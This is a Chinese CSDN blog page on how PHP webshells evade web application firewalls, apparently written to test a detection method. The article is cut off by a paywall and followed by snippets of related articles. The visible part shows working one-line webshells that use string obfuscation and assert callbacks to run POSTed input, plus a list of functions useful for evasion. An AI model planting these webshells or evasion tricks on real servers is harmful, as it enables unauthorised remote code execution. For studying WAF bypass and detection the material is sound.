PHP常见过waf webshell及最简单检测方法

最新推荐文章于 2022-04-23 00:53:59 发布
最新推荐文章于 2022-04-23 00:53:59 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: python 文章标签: 程序员 互联网 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45084321/article/details/90488134
版权
本文探讨了PHP webshell如何绕过WAF,包括字符串变形、自写函数、回调函数、类利用等多种方法,并介绍了PHP webshell的检测方法,如机器学习、动态检测和静态规则匹配等,提供了实例分析和简单检测思路。
摘要由CSDN通过智能技术生成

为了验证该检测机制,首先了解下目前PHP webshell绕过WAF的方法。

 

常见绕过WAF的PHP webshell

字符串变形

大小写、编码、截取、替换、特殊字符拼接、null、回车、换行、特殊字符串干扰

<?php
$a = base64_decode("YXNzYXNz+00000____");
$a = substr_replace($a,"ert",3);
$a($_POST['x']);
?>

ucwords()
ucfirst()
trim()
substr_replace()
substr()
strtr()
strtoupper()
strtolower()
strtok()
str_rot13()
chr()
gzcompress()、gzdeflate()、gzencode()
gzuncompress()、gzinflate()、gzdecode()
base64_encode()
base64_decode()
pack()
unpack()

自写函数

利用 assert()

<?php 
function test($a){
    $a($_POST['x']);
}
test(assert);
?>

回调函数

<?php 
call_user_func(assert,array($_POST[x]));
?>

call_user_func_array()
array_filter() 
array_walk()  
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var() 
filter_v
最低0.47元/天 解锁文章
程序员爽爽
关注
专栏目录
绕过WAF运行命令执行漏洞的方法大全
hackzkaq的博客
10-09 2192
文章目录**前言****一、windows下**二、进入linux三、一个有趣的例子总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。 一、windows下 1.1 符号与命令的关系 在看一个例子开始之前,首先了解一点,”和^这还有成对的圆括号()符号并不会影响命令的执行。在windows环境下,命令可以不区分大小写 whoami //正常执行 w"h"o"a"m"i //正常执行 w"h"o"a"m"i" //正常执行 wh"“oami //正常执
php-waf合集
12-24
压缩包内包含php版本的waf,支持过滤非法字符及文件等功能
php webshell代码混淆,PHP-WebShell-Bypass-WAF
weixin_39574720的博客
03-21 605
PHP-WebShell-Bypass-WAFPHP WebShell 一句话的结构是:输入和执行,这是经典的PHP 一句话代码:WebShell 的输入点在$_GET和$_POST,执行点在eval(),经典的一句话WAF 都会拦截测试: 测试: 测试: 综合上面三点,可以发现WAF 是通过关键字来拦截的,把这三个测试用例放到安全狗下测试 可以发现,安全狗是通过综合判断来识别WebShel...
php文件包含绕过,文件包含漏洞(绕过姿势) | nmask's Blog
weixin_34419203的博客
03-18 536
谁将烟焚散,散了纵横的牵绊文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell....
AWD攻防比赛 PHP WAF
10-16
AWD攻防比赛 PHP WAF 超强waf,防读flag 比赛用基本可以完美防住
php waf 搭建,开源WAF搭建
weixin_42212965的博客
04-15 1090
ModSecurity在Ubuntu和Nginx上安装,nginx版本为1.14.0。安装需要包下载编译ModSecurity 3.0源代码进入目录运行编译如果出现fatal: No names found, cannot describe anything.,是可以忽略的。ModSecurity连接器下载连接器代码根据已安装的nginx版本安装需要的nginx原代码需要把连接器编译为动态模块到n...
PHP常见waf webshell以及最简单检测方法
01-20
之前在Webshell查杀的新思路中留了一个坑 ,当时没有找到具体找到全部变量的方法,后来通过学习找到了个打印全部量的方法,并再次学习了下PHP webshell绕过WAF方法,以此来验证下此方法是否合理。 如有错误,还请...
利用webshell流量检测实验演示各种php webshell变形方法WAF
最新发布
07-28
- *1* [PHP常见waf webshell以及最简单检测方法](https://blog.csdn.net/weixin_31900373/article/details/115193111)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
php WAF线下攻防用,模块化设计,功能可调,支持SQL AST分析
11-16
手工引用: 将Aegis.php与Aegis_lib.php放在同一目录,然后在防御目标的php文件头部加入<?php $AegisPHPName=__FILE__;include "/tmp/Aegis.php" ;?> 自动安装: 在本地的可以采用AegisManager进行本地安装或卸载,在服务端的用AegisInstaller.php与AegisUninst.php进行安装与卸载。 在防御成功显示图文的模式下,pic.jpg和music.mp3也需要与Aegis.php放在同一目录。 更多引用方式与配置方法请看注释。
WAFPHP:Web应用程序防火墙的php框架
05-16
#WAFPHP# A php framework for Web Application Firewall. 一个PHPWeb应用防护框架。 旨在提供一个与现有代码互不冲突干扰PHPWeb应用防护框架,可基于此框架之上开发各种诸如防机器人恶意采集等Web应用防护插件,即插即用,乃居家旅行必备良药。 PS:当然,这只是一种思路,适用于某些特殊场景,它并不能完全替代你的专业防火墙 :) 起步: // 为避免影响WAFPHP的输出,在加载WAFPHP之前请勿有任何html输出 require_once '#your WAFPHP path#/WAFPHP.php'; // 单例模式启动WAFPHP $wafPHP = WAFPHP\WAFPHP::getInstance(); // 执行脚本检测 $wafPHP->runCheck(); #Your code# 或者 // 为避免影响WAFP
include waf.php,waf.php
weixin_28822955的博客
03-10 94
function customError($errno, $errstr, $errfile, $errline) {echo "Error number: [$errno],error on line $errline in $errfile";die();}set_error_handler("customError", E_ERROR);$getfilter="'|(and|or)\\b.+...
基于PHP扩展的WAF实现
swordheart的博客
04-23 2191
0x00 前言 最近上(ri)网(zhan)上(ri)多了,各种狗啊盾啊看的好心烦,好多蜜汁shell都被杀了,搞的我自己也想开发这么一个斩马刀,顺便当作毕设来做了。 未知攻,焉知防。我们先来看看shell们都是怎么躲过查杀的:加密、变形、回调、隐藏关键字……总之就是一句话,让自己变得没有特征,这样就可以躲过狗和盾的查杀。但是万变不离其宗,无论怎么变形,最终都会回到类似这样的格式: 1 2 3 <code>#!php $_GET($_P
网络攻防比赛PHP版本WAF
weixin_30932215的博客
04-14 1047
次去打HCTF决赛,用了这个自己写的WAFweb基本上没被打,被打的漏洞是文件包含漏洞,这个功能在本人这个waf里确实很是捉急,由于只是简单检测了..和php[35]{0,1},导致比赛由于文件包含漏洞web上失分了一次。不过现在不是很想去改进了。这个是比赛专用waf,商业价值几乎为0。 如果是框架写出的web就很好部署了,直接require在重写文件或者数据库文件中,如果是零散的p...
php扩展 waf,基于PHP扩展的WAF实现
weixin_39622655的博客
03-18 237
访问一下看看结果:可以看到ls命令成功的执行了,也就是说我们的正常文件是不会被拦截的,而只有upload目录中的文件会被拦截,这样做又会引发另一个弊端,倘若攻击者通过某种方法shell写入正常的文件中,或是与业务结合起来,那么这种防御手段就很难生效了。具体如何防御还要结合其他的特征进行检测,并不是没有办法了,实际应用中不能只依靠检测文件路径这一条规则,需要结合业务进行部署防御方案。另一种方法与这...
phpwaf 一句话,(转)一句话木马绕过WAF
weixin_39897070的博客
03-16 2023
在渗透测试的后期,为了维持权限。我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门。但是事情总不是一帆风顺的,在上传一句话木马以及使用一句话木马的过程中我们要跟WAF斗智斗勇。今天这期我们从一句话木马的工作机制和WAF工作机制入手来讲如何绕过WAF检测。一、一句话木马和WAF介绍在这里就不再科普一句话木马的介绍,不明白的得可以看这里:一句话木马-百度百科。WAF的介绍可以看...
php waf 搭建,如何构建属于自己的nginx waf防火墙 VeryNginx
weixin_42349469的博客
04-15 374
构建自己防火墙的原因 : 需要对特定链接进行防cc攻击 但对某些链接不需要进行防cc攻击技术选型: 基于 nginx + lua 的 verynginx1、首先verynginx 需要nginx 编译安装模块 或者使用openrestylua-nginx-modulehttp_stub_status_modulehttp_ssl_module2、verynginx 自带的openresty...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值